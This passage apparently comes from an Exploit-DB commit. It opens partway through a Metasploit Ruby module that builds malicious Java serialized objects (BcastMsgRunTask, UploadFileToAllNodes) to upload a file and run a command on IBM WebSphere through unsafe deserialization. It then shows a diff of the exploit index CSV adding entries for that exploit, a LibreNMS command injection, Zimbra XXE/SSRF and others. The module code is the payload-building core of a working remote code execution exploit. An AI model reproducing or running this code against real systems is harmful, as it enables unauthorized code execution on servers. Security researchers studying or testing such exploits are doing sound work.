msg_class_desc.fields << filebody_field
msg_class_desc.fields << filename_field
msg_class_desc.fields << post_cmd_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
# Create the byte array ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 7
# Construct IP Array
byte_array = Rex::Java::Serialization::Model::NewArray.new
byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
byte_array.array_description.description = field_ref
byte_array.type = "byte"
byte_array.values = bytes
# Set the member values
object = Rex::Java::Serialization::Model::NewObject.new
object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
object.class_desc.description = msg_class_desc
object.class_data << byte_array
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, filename)
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, cmd)
object
end
def build_bcast_run_task_msg(obj, msg_type, source_ip, source_port, upfile_arg_obj)
msg_obj = build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
# Create the integer field and add the reference
out_int_field = Rex::Java::Serialization::Model::Field.new
out_int_field.type = 'int'
out_int_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'outputGatherInterval')
# Create the task object field and add field_type
task_field = Rex::Java::Serialization::Model::Field.new
task_field.type = 'object'
task_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'task')
task_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
# Create the task object field and add field_type
task_arg_field = Rex::Java::Serialization::Model::Field.new
task_arg_field.type = 'object'
task_arg_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'taskArgument')
task_arg_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/io/Serializable;")
# Create the integer field and add the reference
forward_gather_field = Rex::Java::Serialization::Model::Field.new
forward_gather_field.type = 'int'
forward_gather_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'forwardGatheredDataPipelinePeriod')
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.BcastMsgRunTask')
msg_class_desc.serial_version = 1
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << forward_gather_field
msg_class_desc.fields << out_int_field
msg_class_desc.fields << task_field
msg_class_desc.fields << task_arg_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = msg_obj
# Set the member values
obj.class_data << ['int', 0]
obj.class_data << ['int', 1]
obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileToAllNodes')
obj.class_data << upfile_arg_obj
msg_class_desc
end
end

4
files_exploits.csv
View file

@ -6473,6 +6473,7 @@ id,file,description,date,author,type,platform,port
46940,exploits/multiple/dos/46940.txt,"Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation",2019-05-29,"Google Security Research",dos,multiple,
46941,exploits/android/dos/46941.txt,"Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL",2019-05-29,"Google Security Research",dos,android,
46946,exploits/windows/dos/46946.py,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service",2019-05-30,n1xbyte,dos,windows,
46968,exploits/multiple/dos/46968.html,"Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free",2019-06-05,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -17480,6 +17481,8 @@ id,file,description,date,author,type,platform,port
46942,exploits/java/remote/46942.rb,"Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)",2019-05-29,Metasploit,remote,java,
46960,exploits/hardware/remote/46960.py,"NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow",2019-06-04,@0x00string,remote,hardware,
46961,exploits/hardware/remote/46961.py,"Cisco RV130W 1.0.3.44 - Remote Stack Overflow",2019-06-04,@0x00string,remote,hardware,
46969,exploits/windows/remote/46969.rb,"IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)",2019-06-05,Metasploit,remote,windows,
46970,exploits/linux/remote/46970.rb,"LibreNMS - addhost Command Injection (Metasploit)",2019-06-05,Metasploit,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41375,3 +41378,4 @@ id,file,description,date,author,type,platform,port
46964,exploits/java/webapps/46964.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
46965,exploits/java/webapps/46965.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,

Can't render this file because it is too large.